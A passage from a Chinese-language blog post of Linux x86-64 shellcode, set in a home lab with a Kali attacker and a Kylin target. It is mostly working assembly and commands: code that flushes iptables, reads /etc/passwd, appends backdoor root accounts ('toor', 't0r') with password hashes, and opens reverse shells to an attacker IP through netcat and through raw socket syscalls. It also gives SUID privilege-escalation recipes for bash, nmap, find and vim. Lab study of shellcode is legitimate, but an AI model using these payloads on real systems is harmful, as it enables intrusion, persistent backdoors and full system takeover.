rcx</span><br><span class="line"> push rdi</span><br><span class="line"> mov rsi, rsp</span><br><span class="line"> </span><br><span class="line"> ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL);</span><br><span class="line"> mov al, 0x3b</span><br><span class="line"> syscall</span><br></pre></td></tr></table></figure><h1 id="4-passwd"><a class="markdownIt-Anchor" href="#4-passwd"></a> 4. passwd</h1><h2 id="41-读取-passwd"><a class="markdownIt-Anchor" href="#41-读取-passwd"></a> 4.1 读取 passwd</h2><h3 id="cat-读取"><a class="markdownIt-Anchor" href="#cat-读取"></a> cat 读取</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">; catPasswd.asm</span><br><span class="line">; execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)</span><br><span class="line"></span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line"></span><br><span class="line"> xor rax, rax ; Zeroes out RAX.</span><br><span class="line"> xor rbp, rbp ; Zeroes out RBP.</span><br><span class="line"></span><br><span class="line"> push rax ; Pushes RAX's NULL-DWORD.</span><br><span class="line"></span><br><span class="line"> mov rbp, 0x6477737361702f63 ; Moves value "dwsspa/c" into RBP.</span><br><span class="line"> push rbp ; Pushes the vaueof RBP into the Stack.</span><br><span class="line"></span><br><span class="line"> mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.</span><br><span class="line"> push rbp ; Pushes the vaue of RBP into the Stack.</span><br><span class="line"></span><br><span class="line"> mov rbp, rsp ; Copies the value of the Stack into RBP.</span><br><span class="line"> push rax ; Pushes RAX's NULL-DWORD.</span><br><span class="line"></span><br><span class="line"> mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.</span><br><span class="line"> push rbx ; Pushes the vaue of RBX into the Stack.</span><br><span class="line"></span><br><span class="line"> mov rbx, rsp ; Copies the value of the Stack into RBX.</span><br><span class="line"></span><br><span class="line"> mov rdi, rsp ; Copies the value of the Stack into RDI.</span><br><span class="line"> push rax ; Pushes RAX's NULL-DWORD.</span><br><span class="line"></span><br><span class="line"> mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.</span><br><span class="line"></span><br><span class="line"> push rbp ; Pushes the vaue of RBP into the Stack.</span><br><span class="line"> push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/passwd".</span><br><span class="line"></span><br><span class="line"> mov rsi, rsp ; Copies this entire string from the Stack into RSI.</span><br><span class="line"></span><br><span class="line"> push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).</span><br><span class="line"> pop ax ; Pops this value into AX so there are no NULLs.</span><br><span class="line"> syscall ; The syscall is executed.</span><br></pre></td></tr></table></figure><h3 id="系统调用读取"><a class="markdownIt-Anchor" href="#系统调用读取"></a> 系统调用读取</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">; readPasswd.asm</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">jmp _push_filename</span><br><span class="line"> </span><br><span class="line">_readfile:</span><br><span class="line">; syscall open file, 0x2</span><br><span class="line">; open('/etc/passwd', O_RDWR), O_RDWR=0x2</span><br><span class="line">pop rdi ; pop path value</span><br><span class="line">xor rax, rax</span><br><span class="line">add al, 2</span><br><span class="line">xor rsi, rsi ; set O_RDWR flag</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">; syscall read file, 0x0</span><br><span class="line">; read(fd, buf, 0xfff), rdi=rax=fd(fd is open's return number)</span><br><span class="line">sub sp, 0xfff</span><br><span class="line">lea rsi, [rsp]</span><br><span class="line">mov rdi, rax</span><br><span class="line">xor rdx, rdx</span><br><span class="line">mov dx, 0xfff; size to read</span><br><span class="line">xor rax, rax</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">; syscall write to stdout, 0x1</span><br><span class="line">; write(fd, buf, 0xfff)</span><br><span class="line">xor rdi, rdi</span><br><span class="line">inc rdi ; set stdout fd = 1</span><br><span class="line">mov rdx, rax</span><br><span class="line">xor rax, rax</span><br><span class="line">inc rax</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">; syscall exit</span><br><span class="line">xor rax, rax</span><br><span class="line">add al, 60</span><br><span class="line">syscall</span><br><span class="line"> </span><br><span class="line">_push_filename:</span><br><span class="line">call _readfile</span><br><span class="line">path: db "/etc/passwd"</span><br></pre></td></tr></table></figure><h2 id="42-写入-passwd"><a class="markdownIt-Anchor" href="#42-写入-passwd"></a> 4.2 写入 passwd</h2><h3 id="0x1-2"><a class="markdownIt-Anchor" href="#0x1-2"></a> 0x1</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line">; addRootUser.asm</span><br><span class="line">; 注:需要root权限</span><br><span class="line">; Action: Adds a user into /etc/passwd with the following information</span><br><span class="line">; username: toor</span><br><span class="line">; password: toor</span><br><span class="line">; uid: 0</span><br><span class="line">; gid: 0</span><br><span class="line">; home: /root</span><br><span class="line">; shell: /bin/sh</span><br><span class="line">;</span><br><span class="line">; toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh</span><br><span class="line"></span><br><span class="line">global _start</span><br><span class="line"></span><br><span class="line">section .text</span><br><span class="line"></span><br><span class="line">_start:</span><br><span class="line">jmp _push_filename</span><br><span class="line"></span><br><span class="line">; #define __NR_open 2</span><br><span class="line">; int open(const char *pathname, int flags);</span><br><span class="line">; rax -> 2</span><br><span class="line">; rdi -> /etc/passwd</span><br><span class="line">; rsi -> 0x401</span><br><span class="line">;</span><br><span class="line">; >>> hex(os.O_WRONLY ^ os.O_APPEND)</span><br><span class="line">; 0x401</span><br><span class="line">_openfile:</span><br><span class="line">pop rdi ; rdi -> /etc/passwd</span><br><span class="line">xor rax, rax</span><br><span class="line">xor rsi, rsi ; rsi to zero</span><br><span class="line">mov si, 0x401 ; rsi -> O_WRONLY|O_APPEND</span><br><span class="line">add al, 0x2 ; rax -> 2 (open)</span><br><span class="line">syscall ; open</span><br><span class="line"></span><br><span class="line">xchg rdi, rax ; save returned fd</span><br><span class="line">jmp short get_entry_address ; start jmp-call-pop</span><br><span class="line"></span><br><span class="line">write_entry:</span><br><span class="line">; #define __NR_write 1</span><br><span class="line">; ssize_t write(int fd, const void *buf, size_t count);</span><br><span class="line">; rax -> 1</span><br><span class="line">; rdi -> results of open syscall</span><br><span class="line">; rsi -> user's entry</span><br><span class="line">; rdx -> len of user's entry</span><br><span class="line">pop rsi ; end jmp-call-pop, rsi -> user's entry</span><br><span class="line">push 0x1</span><br><span class="line">pop rax ; rax -> 1</span><br><span class="line">push 38 ; length + 1 for newline</span><br><span class="line">pop rdx ; rdx -> length of user's entry</span><br><span class="line">syscall ; write</span><br><span class="line"></span><br><span class="line">; #define __NR_exit 60</span><br><span class="line">; void _exit(int status);</span><br><span class="line">; rax -> 60</span><br><span class="line">; rdi -> don't care</span><br><span class="line">push 60</span><br><span class="line">pop rax</span><br><span class="line">syscall ; OS will handle closing fd at exit</span><br><span class="line"></span><br><span class="line">get_entry_address:</span><br><span class="line">call write_entry</span><br><span class="line">user_entry: db "toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh",0xa</span><br><span class="line"></span><br><span class="line">_push_filename:</span><br><span class="line">call _openfile</span><br><span class="line">path: db "/etc/passwd"</span><br></pre></td></tr></table></figure><h3 id="0x2-2"><a class="markdownIt-Anchor" href="#0x2-2"></a> 0x2</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">; addRootUser_tor.asm</span><br><span class="line">; 注;需要root权限</span><br><span class="line">;Purpose: adds user "t0r" with password "Winner" to /etc/passwd</span><br><span class="line">;executed syscalls: setreuid, setregid, open, write, close, exit</span><br><span class="line">;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash</span><br><span class="line">;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.h</span><br><span class="line"></span><br><span class="line">section .text</span><br><span class="line">global _start</span><br><span class="line">_start:</span><br><span class="line"> ;sys_setreuid(uint ruid, uint euid)</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 113 ;syscall sys_setreuid</span><br><span class="line"> xor rbx, rbx ;arg 1 -- set real uid to root</span><br><span class="line"> mov rcx, rbx ;arg 2 -- set effective uid to root</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_setregid(uint rgid, uint egid)</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 114 ;syscall sys_setregid</span><br><span class="line"> xor rbx, rbx ;arg 1 -- set real uid to root</span><br><span class="line"> mov rcx, rbx ;arg 2 -- set effective uid to root</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;push all strings on the stack prior to file operations.</span><br><span class="line"> xor rbx, rbx</span><br><span class="line"> mov ebx, 0x647773FF</span><br><span class="line"> shr rbx, 8</span><br><span class="line"> push rbx ;string \00dws</span><br><span class="line"> mov rbx, 0x7361702f6374652f</span><br><span class="line"> push rbx ;string sap/cte/</span><br><span class="line"> mov rbx, 0x0A687361622F6EFF</span><br><span class="line"> shr rbx, 8</span><br><span class="line"> push rbx ;string \00\nhsab/n</span><br><span class="line"> mov rbx, 0x69622F3A746F6F72</span><br><span class="line"> push rbx ;string ib/:toor</span><br><span class="line"> mov rbx, 0x2F3A3A303A303A67</span><br><span class="line"> push rbx ;string /::0:0:g</span><br><span class="line"> mov rbx, 0x46556B554B587435</span><br><span class="line"> push rbx ;string FUkUKXt5</span><br><span class="line"> mov rbx, 0x546755333A723074</span><br><span class="line"> push rbx ;string TgU3:r0t</span><br><span class="line"> </span><br><span class="line"> ;prelude to doing anything useful...</span><br><span class="line"> mov rbx, rsp ;save stack pointer for later use</span><br><span class="line"> push rbp ;store base pointer to stack so it can be restored later</span><br><span class="line"> mov rbp, rsp ;set base pointer to current stack pointer</span><br><span class="line"> </span><br><span class="line"> ;sys_open(char* fname, int flags, int mode)</span><br><span class="line"> sub rsp, 16</span><br><span class="line"> mov [rbp - 16], rbx ;store pointer to "t0r..../bash"</span><br><span class="line"> mov si, 0x0401 ;arg 2 -- flags</span><br><span class="line"> mov rdi, rbx</span><br><span class="line"> add rdi, 40 ;arg 1 -- pointer to "/etc/passwd"</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 2 ;syscall sys_open</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_write(uint fd, char* buf, uint size)</span><br><span class="line"> mov [rbp - 4], eax ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.</span><br><span class="line"> mov rcx, rbx ;arg 2 -- load rcx with pointer to string "t0r.../bash"</span><br><span class="line"> xor rdx, rdx</span><br><span class="line"> mov dl, 39 ;arg 3 -- load rdx with size of string "t0r.../bash\00"</span><br><span class="line"> mov rsi, rcx ;arg 2 -- move to source index register</span><br><span class="line"> mov rdi, rax ;arg 1 -- move to destination index register</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 1 ;syscall sys_write</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_close(uint fd)</span><br><span class="line"> xor rdi, rdi</span><br><span class="line"> mov edi, [rbp - 4] ;arg 1 -- load stored file descriptor to destination index register</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 3 ;syscall sys_close</span><br><span class="line"> syscall</span><br><span class="line"> </span><br><span class="line"> ;sys_exit(int err_code)</span><br><span class="line"> xor rax, rax</span><br><span class="line"> mov al, 60 ;syscall sys_exit</span><br><span class="line"> xor rbx, rbx ;arg 1 -- error code</span><br><span class="line"> syscall</span><br></pre></td></tr></table></figure><h1 id="5-反向-shell"><a class="markdownIt-Anchor" href="#5-反向-shell"></a> 5. 反向 shell</h1><h2 id="50-部署"><a class="markdownIt-Anchor" href="#50-部署"></a> 5.0 部署</h2><p>【1】先在攻击端(kali: 192.168.188.141)输入以下命令。</p><p><img src="/2022/09/06/shellcode-linux-x86-64/image-20220817211511413.png" alt="image-20220817211511413"></p><p>【2】然后在靶机端(Kylin:192.168.188.146)运行shellcode</p><h2 id="51-netcat-命令行"><a class="markdownIt-Anchor" href="#51-netcat-命令行"></a> 5.1 netcat 命令行</h2><p>由于 kylin 上原装的 netcat 是阉割版本,没有 -e 参数的,我们先需要安装完整版的 netcat。我将它安装在 /home/sakura/tools/netcat 目录下。</p><blockquote><p>安装教程:<a href="https://www.freebuf.com/sectool/243115.html">这可能是netcat最全的使用指南</a></p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">; netcatRevTcp.asm</span><br><span class="line">; 注:以下参数需要根据您的电脑上netcat的安装目录重新配置,IP地址也需要重新配置。</span><br><span class="line">;execve("/home/sakura/tools/netcat/src/netcat", ["/home/sakura/tools/netcat/src/ne"..., "-e", "/bin/sh", "192.168.188.141", "5566"], NULL) = 0</span><br><span class="line"></span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line">_start:</span><br><span class="line"> push rbp</span><br><span class="line"> mov rbp, rsp</span><br><span class="line"> sub rsp, 0x40</span><br><span class="line"> mov qword rax, '5566AAAA'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '188.141A'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '192.168.'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '/bin/shA'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 'tcatA-eA'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 't/src/ne'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 'ls/netca'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, 'kura/too'</span><br><span class="line">push rax</span><br><span class="line">mov qword rax, '/home/sa'</span><br><span class="line">push rax</span><br><span class="line"> </span><br><span class="line"> xor byte [rsp+36], 0x41</span><br><span class="line"> xor byte [rsp+39], 0x41</span><br><span class="line"> xor byte [rsp+47], 0x41</span><br><span class="line"> xor byte [rsp+63], 0x41</span><br><span class="line"> xor byte [rsp+71], 0x41</span><br><span class="line"> xor byte [rsp+70], 0x41</span><br><span class="line"> xor byte [rsp+69], 0x41</span><br><span class="line"> xor byte [rsp+68], 0x41</span><br><span class="line"></span><br><span class="line">xor rax, rax</span><br><span class="line">mov rdi, rsp</span><br><span class="line">push rax</span><br><span class="line">lea rbx, [rdi+64]</span><br><span class="line">push rbx</span><br><span class="line">lea rbx, [rdi+48]</span><br><span class="line">push rbx</span><br><span class="line">lea rbx, [rdi+40]</span><br><span class="line">push rbx</span><br><span class="line">lea rbx, [rdi+37]</span><br><span class="line">push rbx</span><br><span class="line">push rdi</span><br><span class="line">mov rsi, rsp</span><br><span class="line">xor rdx, rdx </span><br><span class="line"></span><br><span class="line"> add al , 59</span><br><span class="line"> syscall</span><br></pre></td></tr></table></figure><h2 id="52-系统调用"><a class="markdownIt-Anchor" href="#52-系统调用"></a> 5.2 系统调用</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">; revTcp.asm</span><br><span class="line">; 注:在17行和18行的ip地址需要根据实际环境重新配置</span><br><span class="line">; 攻击端ip:192.168.188.141</span><br><span class="line">; 攻击端 post:5566</span><br><span class="line">global _start</span><br><span class="line">section .text</span><br><span class="line">_start:</span><br><span class="line"> ;Socket</span><br><span class="line"> xor rdx, rdx ; zero out rdx</span><br><span class="line"> mov rsi, rdx ; AF_NET = 1</span><br><span class="line"> inc rsi ; rsi = AF_NET</span><br><span class="line"> mov rdi, rsi ; SOCK_STREAM = 2</span><br><span class="line"> inc rdi ; rdi = SOCK_STREAM</span><br><span class="line"> add ax, 0x29</span><br><span class="line"> syscall ; call socket(SOCK_STREAM, AF_NET, 0);</span><br><span class="line"></span><br><span class="line"> mov r12, rax</span><br><span class="line"> sub rsp,0x10</span><br><span class="line"> mov dword [rsp+0x4],0x8dbca8c0; ip = 192.168.188.141</span><br><span class="line"> mov word [rsp+0x2],0xbe15; post = 5566</span><br><span class="line"> mov word [rsp],0x2</span><br><span class="line"></span><br><span class="line"> ; Connect = 0x2a</span><br><span class="line"> mov rdi, rax ; move the saved socket fd into rdi</span><br><span class="line"> mov rsi, rsp ; move the saved sock_addr_in into rsi</span><br><span class="line"> add dx, 0x10 ; add 0x10 to rdx</span><br><span class="line"> xor rax, rax </span><br><span class="line"> add ax, 0x2a</span><br><span class="line"> syscall ; call connect(rdi, rsi, rdx)</span><br><span class="line"></span><br><span class="line"> xor rsi, rsi ; zero out rsi</span><br><span class="line"></span><br><span class="line"> dup:</span><br><span class="line"> xor rax, rax</span><br><span class="line"> add ax, 0x21 ; move the syscall for dup2 into rax</span><br><span class="line"> mov rdi, r12 ; move the FD for the socket into rdi</span><br><span class="line"> syscall ; call dup2(rdi, rsi)</span><br><span class="line"></span><br><span class="line"> cmp rsi, 0x2 ; check to see if we are still under 2</span><br><span class="line"> inc rsi ; inc rsi</span><br><span class="line"> jbe dup ; jmp if less than 2</span><br><span class="line"></span><br><span class="line"> ;sub r8, 0x1F ; setup the exec syscall at 0x3b</span><br><span class="line"> xor rax, rax </span><br><span class="line"> add ax, 0x3b ; move the syscall into rax</span><br><span class="line"></span><br><span class="line"> ;exec</span><br><span class="line"> xor rdx, rdx ; zero out rdx</span><br><span class="line"> mov qword rbx, '//bin/sh' ; '/bin/sh' in hex</span><br><span class="line"> shr rbx,0x8 ; shift right to create the null terminator</span><br><span class="line"> push rbx</span><br><span class="line"></span><br><span class="line"> mov rdi, rsp</span><br><span class="line"> push rdx</span><br><span class="line"> push rdi ; move the command from the stack to rdi</span><br><span class="line"> mov rsi, rsp ; zero out rsi</span><br><span class="line"> syscall ; call exec(rdi, rsi, 0)</span><br></pre></td></tr></table></figure><h1 id="6-提权方法"><a class="markdownIt-Anchor" href="#6-提权方法"></a> 6. 提权方法</h1><h2 id="61-bash"><a class="markdownIt-Anchor" href="#61-bash"></a> 6.1 bash</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~$ sudo chmod u+s /bin/bash</span><br><span class="line">sakura@Kylin:~$ ll /bin/bash</span><br><span class="line">-rwsr-xr-x 1 root root 1183448 6月 4 2021 /bin/bash*</span><br><span class="line">sakura@Kylin:~$ bash -p</span><br><span class="line">bash-5.0# whoami</span><br><span class="line">root</span><br><span class="line">bash-5.0# id</span><br><span class="line">uid=1000(sakura) gid=1000(sakura) euid=0(root) 组=1000(sakura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),119(lpadmin),129(sambashare)</span><br><span class="line">bash-5.0# ./addRootUser </span><br><span class="line">bash-5.0# cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">。。。。。。</span><br><span class="line">toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh</span><br><span class="line">bash-5.0# </span><br></pre></td></tr></table></figure><h2 id="62-nmap"><a class="markdownIt-Anchor" href="#62-nmap"></a> 6.2 nmap</h2><p>判断nmap版本,<code>nmap -v</code>,如果版本在2.02至5.21之间,则可以提权</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">nmap> </span><span class="language-bash">!sh</span></span><br><span class="line">sh-3.2# whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure><h2 id="63-find"><a class="markdownIt-Anchor" href="#63-find"></a> 6.3 find</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~$ sudo chmod u+s /bin/find</span><br><span class="line">sakura@Kylin:~$ ll /bin/find</span><br><span class="line">-rwsr-xr-x 1 root root 320160 4月 15 2020 /bin/find*</span><br><span class="line">sakura@Kylin:~/文档$ touch anyfile</span><br><span class="line">sakura@Kylin:~/文档$ find anyfile -exec whoami \;</span><br><span class="line">root</span><br><span class="line">sakura@Kylin:~/文档$ </span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#进入shell</span><br><span class="line">sakura@Kylin:~/文档$ find anyfile -exec "/bin/bash" "-p" \;</span><br><span class="line">sh-5.0# whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure><h2 id="64-vim"><a class="markdownIt-Anchor" href="#64-vim"></a> 6.4 vim</h2><p>利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~$ sudo chmod u+s /bin/vim.tiny</span><br><span class="line">sakura@Kylin:~$ vim.tiny /etc/passwd</span><br><span class="line">sakura@Kylin:~$ cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">、、、、</span><br><span class="line">hello</span><br><span class="line">sakura@Kylin:~$ </span><br></pre></td></tr></table></figure><h1 id="7-关闭-aslr"><a class="markdownIt-Anchor" href="#7-关闭-aslr"></a> 7. 关闭 ASLR</h1><p><strong>配置选项</strong></p><ul><li>0 = 关闭</li><li>1 = 半随机。共享库、栈、mmap() 以及 VDSO 将被随机化。(留坑,PIE会影响heap的随机化。。)</li><li>2 = 全随机。除了1中所述,还有heap。</li></ul><p><strong>方法一: 手动修改randomize_va_space文件</strong></p><figure class="highlight shell"><table><tr><td 